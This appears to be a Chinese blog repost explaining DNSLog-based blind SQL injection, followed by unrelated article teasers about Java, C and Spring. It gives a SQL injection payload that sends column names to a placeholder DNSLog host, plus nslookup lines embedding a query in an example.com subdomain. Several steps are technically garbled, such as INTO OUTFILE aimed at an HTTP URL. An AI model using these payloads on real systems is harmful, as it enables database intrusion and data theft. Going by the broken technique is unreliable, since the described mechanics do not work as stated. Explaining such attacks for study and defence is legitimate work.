利用 DNSLog无回显注入

news2024/11/25 2:47:02

DNSLog概念

DNSLog(域名系统日志)是一种特殊的技术和服务,用于捕获和记录通过域名系统(DNS)协议进行的请求和响应。它的目的是帮助用户跟踪、分析和管理DNS流量,并收集与域名相关的信息。

基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。当客户端(如Web浏览器、应用程序)发送DNS请求时,服务器将记录请求,然后产生一个响应,响应中包含一些原始请求信息。这些信息可以包括IP地址、用户代理字符串、时间戳和其他相关的数据。

DNSLog无回显注入的原理

无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。

利用DNSLog实现无回显注入的步骤

  1. 构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。例如,在SQL注入攻击的情况下,可以使用如下payload:

    ' OR 1=1 UNION SELECT 1, group_concat(column_name) FROM information_schema.columns INTO OUTFILE 'http://your-dnslog-service.com/' --
    

    这个负载将触发一个DNS请求,将目标应用程序中的列名信息发送到DNSLog服务。

  2. 插入payload:在目标应用程序的注入点处插入payload。具体方法取决于目标应用程序的结构和漏洞点。通常,注入点位于应用程序的输入字段中。

  3. 触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。

  4. 检查DNSLog服务:访问您选择的DNSLog服务,检查是否收到DNS请求。如果成功触发注入,您将能够在DNSLog服务上看到相应的请求记录。

举个栗子

利用DNSLog获取数据库表信息

注入点:在目标应用程序中找到注入点,构造注入语句。

SELECT table_name FROM information_schema.tables WHERE table_schema=database()

 

将注入语句作为DNS请求的一部分,发送到DNSLog服务器。

nslookup `SELECT table_name FROM information_schema.tables WHERE table_schema=database()`.example.com

 

在DNSLog服务器上查看DNS请求的响应,获取注入结果。

nslookup -type=txt SELECT.*.example.com

图解 

大家可以参考大佬的文章

 SQL注入之dnslog注入 – ngin0x's blog

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/775394.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

JDBC 异常处理(SQLException)

异常处理允许您以受控的方式处理异常情况,例如程序定义的错误。 发生异常情况时,将引发异常。抛出这个词意味着当前程序停止执行,并且控件被重定向到最接近的适用catch子句。如果不存在适用的catch子句,则程序的执行结束。 JDBC…

提升内功之模拟实现库函数strlen/strncpy/strcmp/strcat/strstr/memcpy/memmove

strlenstrncpystrcmpstrcatstrstrmemcpymemmove strlen strlen函数的作用就是求字符串的首元素开始往后计算字符串的长度&#xff0c;直到’\0‘&#xff0c;但不会把\0的长度计算进去 #include<stdio.h>size_t Strlen(const char* src) {size_t count 0;while (*src ! …

SpringBoot 集成 EasyExcel 3.x导入导出

SpringBoot 集成 EasyExcel 3.x导入导出 介绍 EasyExcel 是一个基于 Java 的、快速、简洁、解决大文件内存溢出的 Excel 处理工具。它能让你在不用考虑性能、内存的等因素的情况下&#xff0c;快速完成 Excel 的读、写等功能。 EasyExcel文档地址&#xff1a; https://easyex…

IDEA + Spring Boot + Security + MyBatis Plus+Mysql低代码快速开发平台

IDEA Spring Boot Security MyBatis PlusMysql低代码快速开发平台 一、系统介绍1.环境配置 二、系统展示1. 管理员登录2.主页3.用户管理4.角色管理5. 权限管理6. 部门管理7. 数据字典8.文件管理9.系统配置10.电子邮件11.站内消息12.数据监控13.定时任务14.在线用户15.任务日…

芯片验证板卡设计方案:基于VU440T的多核处理器多输入芯片验证板卡

基于VU440T的多核处理器多输入芯片验证板卡 一、板卡概述 基于XCVU440-FLGA2892的多核处理器多输入芯片验证板卡为实现网络交换芯片的验证&#xff0c;包括四个FMC接口、DDR、GPIO等&#xff0c;板卡用于完成甲方的芯片验证任务&#xff0c;多任务功能验证。 …

图书管理系统【C语言】

咱就是说这太令人绝望了&#xff01; &#xff01;&#xff01; 图书管理系统 这是一个平平无奇的系统。 一、系统要求 1、实现以下基本功能 1.添加图书 2.删除图书 3.保存图书 4.图书列表 5.修改图书 6.查找图书 7.图书排序 …

网络安全运维工程师的主要职责

什么是安全运维工程师呢&#xff1f;安全运维工程师就是网络安全大方向下的网络安全运行与维护的一个细分岗。 IT运维工作方向比较多&#xff0c;列如安全运维、数据运维、应用运维、系统运维等&#xff0c;今天我们就来了解一下网络完全运维工程师是什么&#xff1f;同时也了…

【Java】顺序表

文章目录 顺序表LinkedListArrayList构造方法带参&#xff08;int&#xff09;构造不带参构造满&#xff0c;需要扩容 remove()remove(int)remove(Object) subList() 几点注意顺序表的优缺点优点&#xff1a;缺点&#xff1a; 顺序表 底层是数组&#xff0c;进行动态分配后可以…

NAT种类和NAT穿越

NAT种类 说明 NAT有三种类型&#xff1a;静态NAT(tatic NAT)、动态地址NAT(Pooled NAT)和网络地址端口转换(NetworkAddress PortTranslation&#xff0c;NAPT)。 其中静态NAT设置起来最简单&#xff1b; 内部网络中的每个主机都被永久映射成外部网络中的某个合法的地址&#x…

求出0~100000之间的所有“水仙花数”并输出

求出0~100000之间的所有“水仙花数”并输出。 “水仙花数”是指一个N位数&#xff0c;其各位数字的n次方之和正好等于该数本身。 如&#xff1a;1531^3 5^3 3^3 , 则153是一个“水仙花数” 先来了解一下水仙花数的概念&#xff1a; 水仙花数只是自幂数的一种&#xff0c;严…

Flutter侧边栏组件Drawer

主要代码&#xff1a; drawer: const Drawer(child: Column(children: [Row(children: [Expanded(flex: 1,child: UserAccountsDrawerHeader(accountName: Text("张三"),accountEmail: Text("xxxqq.com"),currentAccountPicture: CircleAvatar(backgroundI…

解决git克隆到本地的仓库文件夹不显示红色感叹号、绿色对号等图标的问题

电脑有时候重启或者别的什么原因导致本地仓库不显示绿勾或者红色感叹号的符号 第一步: win加R然后输入regedit打开注册表 第二步: 按下面路径打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers 找到如下图在Tort…

浅谈JVM内存结构

一、JVM内存结构的大概划分&#xff1a; 1.1 堆(Heap) 线程共享。所有的对象实例以及数组都要在堆上分配。回收器主要管理的对象。 1.1.1 堆结构 堆可以处于物理上不连续的内存空间中&#xff0c;只要逻辑上是连续的即可。堆的内部结构按照传统的做法分成新生代和老年代&…

喝汽水问题:1瓶汽水1元。2个空瓶可以换1瓶汽水,给20元,可以买多少汽水 (7.19)

泪目&#xff01;&#xff01;&#xff01;终于是自己完完整整写出的代码了&#xff0c;不翻资料也没看参考代码 &#xff08;之前的要么和老师练习&#xff0c;要么找教材东拼西凑&#xff09; 方法2&#xff1a;数学角度看bottle价值0.5 元&#xff0c;20元最多可换40bottl…

Python venv 和 virtualenv 虚拟环境的基本使用

1.前言 venv 和 virtualenv 都是搭建虚拟环境的工具&#xff0c;virtualenv 是第三方开源的&#xff0c;而 venv 作为 virtualenv 的一个子集自 Python3.3 开始集成到标准库中&#xff0c;在 virtualenv 的文档中可以看到他们的区别&#xff1a; 没有 app-data 种子方法&#…

LLM 盛行,如何优雅地训练大模型?

作者 | 王嘉宁 整理 | NewBeeNLP https://wjn1996.blog.csdn.net/article/details/130764843 大家好&#xff0c;这里是 NewBeeNLP。 ChatGPT于2022年12月初发布&#xff0c;震惊轰动了全世界&#xff0c;发布后的这段时间里&#xff0c;一系列国内外的大模型训练开源项目接踵而…

手把手教你搭建SpringCloud项目(十)集成Hystrix之服务降级

什么是微服务&#xff1f;一看就会系列&#xff01; 一、手把手教你搭建SpringCloud项目&#xff08;一&#xff09;图文详解&#xff0c;傻瓜式操作 二、手把手教你搭建SpringCloud项目&#xff08;二&#xff09;生产者与消费者 三、手把手教你搭建SpringCloud项目&#x…

公司老项目改造适配不同分辨率2k、3k、4k

项目改造适配不同分辨率 最近公司要做项目适配2k、3k、4k屏的分辨率&#xff0c;在网上找了很多中方案&#xff0c;常用且方便的是使用zoom全局缩放&#xff0c;因为是老项目所以对样式进行了重写整体使用了flex百分比布局 使用 1、在utils文件夹中新建一个zoom.js文件 这个是…

ACL 2023 | 持续进化中的语言基础模型

尽管如今的 AI 模型已经具备了理解自然语言的能力&#xff0c;但科研人员并没有停止对模型的不断改善和理论探索。自然语言处理&#xff08;NLP&#xff09;领域的技术始终在快速变化和发展当中&#xff0c;酝酿着新的潮流和突破。 NLP 领域的顶级学术会议国际计算语言学年会 …

java中的三大集合类各自的特点以及适用场景

目录 ​编辑 三大容器的介绍 使用场景介绍 List 实现类 Map 实现类 Set 实现类&#xff1a; 三大容器的介绍 List&#xff08;列表&#xff09; 结构&#xff1a;由有序的元素序列组成&#xff0c;可以包含重复元素特点&#xff1a;可以通过索引访问元素&#xff0c;插入的顺…